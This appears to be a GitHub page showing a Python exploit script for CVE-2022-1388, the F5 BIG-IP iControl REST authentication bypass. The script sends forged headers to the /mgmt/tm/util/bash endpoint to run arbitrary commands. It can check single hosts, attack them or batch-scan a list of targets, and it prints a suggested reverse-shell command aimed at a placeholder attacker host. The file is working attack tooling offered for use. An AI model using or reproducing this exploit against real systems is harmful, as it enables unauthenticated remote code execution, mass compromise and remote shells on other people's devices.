forked from ZephrFish/F5-CVE-2022-1388-Exploit
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE_2022_1388.py
135 lines (108 loc) · 5.01 KB
/
CVE_2022_1388.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
#!/usr/bin/python3.9
# -*- coding: utf-8 -*-
# CVE 2022-1388 F5 Exploit
# Translated by: Google & ZephrFish
# Removed reverse shell option and merged into main function
import requests
import sys
import argparse
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
t = int(time.time())
# Colour Functions
def prRed(skk): print("\033[91m {}\033[00m" .format(skk))
def prGreen(skk): print("\033[92m {}\033[00m" .format(skk))
def prYellow(skk): print("\033[93m {}\033[00m" .format(skk))
def title():
print('''
_____ _ _ _____ _____ _____ _____ _____ __ _____ _____ _____
/ __ \| | | || ___| / __ \| _ |/ __ \/ __ \ / | |____ || _ || _ |
| / \/| | | || |__ ______`' / /'| |/' |`' / /'`' / /'______`| | / / \ V / \ V /
| | | | | || __||______| / / | /| | / / / / |______|| | \ \ / _ \ / _ \
| \__/\\ \_/ /| |___ ./ /___\ |_/ /./ /___./ /___ _| |_.___/ /| |_| || |_| |
\____/ \___/ \____/ \_____/ \___/ \_____/\_____/ \___/\____/ \_____ \_____/
''')
print('''
CVE-2022-1388 F5 Exploit
Usage:
Check Hosts: python3 CVE-2022-1388.py -v true -u target_url
Exploit Host: python3 CVE_2022_1388.py -a true -u target_url -c command
Exploit List: python3 CVE_2022_1388.py -s true -f file
''')
def headers():
headers = {
"Host": "127.0.0.1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36",
'Content-Type': 'application/json',
'Connection': 'keep-alive, x-F5-Auth-Token',
'X-F5-Auth-Token': 'a',
'Authorization': 'Basic YWRtaW46'
}
return headers
def check(target_url):
check_url = target_url + '/mgmt/tm/util/bash'
data = {'command': "run", 'utilCmdArgs': "-c id"}
try:
response = requests.post(url=check_url, json=data, headers=headers(), verify=False, timeout=5)
if response.status_code == 200 and 'commandResult' in response.text:
prGreen("[+] Target {} Vulnerable".format(target_url))
else:
prRed("[-] Target {} Not Vulnerable".format(target_url))
except Exception as e:
prYellow('url access exception {0}'.format(target_url))
def attack(target_url, cmd):
attack_url = target_url + '/mgmt/tm/util/bash'
data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
try:
response = requests.post(url=attack_url, json=data, headers=headers(), verify=False, timeout=5)
if response.status_code == 200 and 'commandResult' in response.text:
default = json.loads(response.text)
display = default['commandResult']
prGreen("[+] Target {} Vulnerable".format(target_url))
print("suggested command for a reverse shell!: bash -i >&/dev/tcp/ATTACKERHOST/attackerport 0>&1")
print('[+] Response:{0}'.format(display))
else:
prRed("[-] Target {} Not Vulnerable".format(target_url))
except Exception as e:
prYellow('url exception {0}'.format(target_url))
def scan(file):
for url_link in open(file, 'r', encoding='utf-8'):
if url_link.strip() != '':
url_path = format_url(url_link.strip())
check(url_path)
def format_url(url):
try:
if url[:4] != "http":
url = "https://" + url
url = url.strip()
return url
except Exception as e:
prYellow('URL Incorrect {0}'.format(url))
def main():
parser = argparse.ArgumentParser("F5 Big-IP RCE")
parser.add_argument('-v', '--verify', type=bool, help=' check target is vulnerable ')
parser.add_argument('-u', '--url', type=str, help=' TargetURL ')
parser.add_argument('-a', '--attack', type=bool, help=' attack mode ')
parser.add_argument('-c', '--command', type=str, default="id", help=' command to execute on remote host ')
parser.add_argument('-s', '--scan', type=bool, help=' Batch Identification, supply a file with target hosts ')
parser.add_argument('-f', '--file', type=str, help=' path to file containing target hosts')
args = parser.parse_args()
verify_model = args.verify
url = args.url
attack_model = args.attack
command = args.command
scan_model = args.scan
file = args.file
if verify_model is True and url is not None:
check(url)
elif attack_model is True and url is not None and command is not None:
attack(url, command)
elif scan_model is True and file is not None:
scan(file)
else:
sys.exit(0)
if __name__ == '__main__':
title()
main()